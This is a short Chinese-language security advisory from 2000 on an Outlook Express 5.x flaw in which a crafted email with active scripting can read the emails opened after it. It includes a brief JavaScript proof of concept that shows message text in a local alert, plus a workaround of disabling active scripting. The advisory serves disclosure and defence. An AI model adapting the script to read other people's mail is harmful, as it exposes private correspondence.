发布日期：2000-02-02
更新日期：2000-02-03

受影响系统：

Microsoft Outlook Express 5.x

描述：

---

<来源：Georgi Guninski.>

概要
    Windows下的Outlook Express 5.x在使用active打开一个恶意信件后，它允许读取随后打开的email信息。通过发送特别制作的email,攻击者可以得到任何你已打开过的email,获取其中的敏感信息。该问题是由于在一个新打开的窗口中分配了一个email信息的文本对象给变量。通过这个变量它可能访问所有已打开的email内容。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click
here to see the active message</A>");
a.x=window.document;
</SCRIPT>


建议：

---

临时解决办法：
    在Outlook Express中禁止活动脚本

浏览次数：6571
严重程度：0（网友投票）